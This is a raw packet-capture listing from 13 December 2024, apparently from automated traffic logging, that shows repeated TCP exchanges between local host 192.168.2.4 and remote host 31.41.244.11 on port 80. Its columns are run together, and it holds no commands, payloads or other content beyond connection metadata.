                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.464776039 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.465630054 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.465658903 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.465675116 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.465691090 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.466722965 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.466789007 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.467176914 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.467225075 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.467828989 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.467879057 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.467915058 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.467953920 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.468852043 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.468903065 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.469341040 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.469389915 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.469996929 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.470040083 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.470355988 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.470398903 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.471091032 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.471138000 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.471398115 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.471443892 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.472131968 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.472178936 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.473259926 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.473284006 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.473304987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.473304987 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.473318100 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.473345041 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.474500895 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.474548101 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.475147009 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.475193977 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.475518942 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.475542068 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.475560904 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.475580931 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.476546049 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.476594925 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.476672888 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.476713896 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.477581978 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.477600098 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.477627993 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.477637053 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.478631973 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.478681087 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.479783058 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.479803085 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.479826927 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.479826927 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.479842901 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.479856968 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.480868101 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.480915070 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.481724977 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.481772900 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.481980085 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.482017994 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.483038902 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.483058929 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.483082056 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.483082056 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.483099937 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.483112097 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.484030962 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.484075069 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.619580984 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.619688034 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.619923115 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.619973898 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.620120049 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.620167017 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.620337009 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.620384932 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.621211052 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.621254921 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.621669054 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.621712923 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.622309923 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.622355938 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.622651100 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.622697115 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.623436928 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.623481989 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.623570919 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.623611927 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.624449015 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.624495029 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.624531031 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.624571085 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.625539064 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.625582933 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.625678062 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.625720024 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.626730919 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.626781940 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.627031088 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.627073050 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.627713919 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.627758026 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.628042936 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.628086090 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.628825903 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.628871918 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.629102945 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.629147053 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.629897118 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.629951000 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.630065918 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.630157948 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.630976915 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.631047010 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.631772995 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.631824970 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.632112026 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.632163048 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.632256985 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.632302999 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.633152962 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.633203030 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.633913040 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.633958101 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.634324074 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.634345055 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.634366035 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.634377956 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.635318995 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.635365009 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.635462046 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.635504007 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.636439085 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.636487007 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.636498928 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.636538029 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.637552977 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.637573957 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.637595892 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.637615919 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.638577938 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.638623953 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.638803005 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.638843060 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.639657974 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.639699936 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.639899969 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.639946938 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.640815020 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.640836954 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.640853882 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.640876055 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.641848087 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.641891956 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.642735958 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.642776966 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.642990112 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.643009901 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.643028975 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.643049002 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.644027948 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.644068003 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.644185066 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.644231081 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.645144939 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.645191908 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.645339966 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.645384073 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.646226883 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.646270990 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.647030115 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.647073984 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.647392988 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.647439003 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.647844076 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.647886038 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.648473978 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.648493052 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.648525953 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.648540974 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.649502039 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.649548054 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.649569035 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.649610043 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.650576115 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.650623083 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.650623083 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.650662899 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.651648998 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.651696920 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.651962996 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.652004004 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.652714014 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.652761936 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.653008938 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.653052092 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.653810024 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.653841019 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.653856039 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.653881073 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.654942036 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.654989958 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.655343056 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.655388117 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.656019926 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.656064987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.656492949 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.656536102 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.657231092 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.657274961 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.657511950 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.657555103 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.658195972 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.658237934 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.658598900 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.658642054 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.659390926 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.659437895 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.660002947 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.660048962 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.660403967 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.660428047 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.660444975 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.660455942 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.662560940 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.662580967 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.662605047 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.662611008 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.662617922 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.662631035 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.662651062 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.662664890 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.663649082 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.663667917 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.663697004 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.663712978 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.664690971 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.664738894 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.665730000 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.665779114 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.665863037 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.665888071 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.665904999 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.665915012 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.667004108 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.667020082 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.667057991 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.667073011 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.667918921 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.667968035 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.669056892 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.669075966 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.669105053 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.669115067 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.669127941 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.669164896 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.670183897 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.670228958 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.670402050 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.670447111 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.671209097 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.671252966 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.671988964 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.672039032 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.672386885 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.672409058 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.672427893 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.672437906 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.673646927 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.673666954 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.673691988 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.673706055 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.674556971 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.674590111 CET804976331.41.244.11192.168.2.4
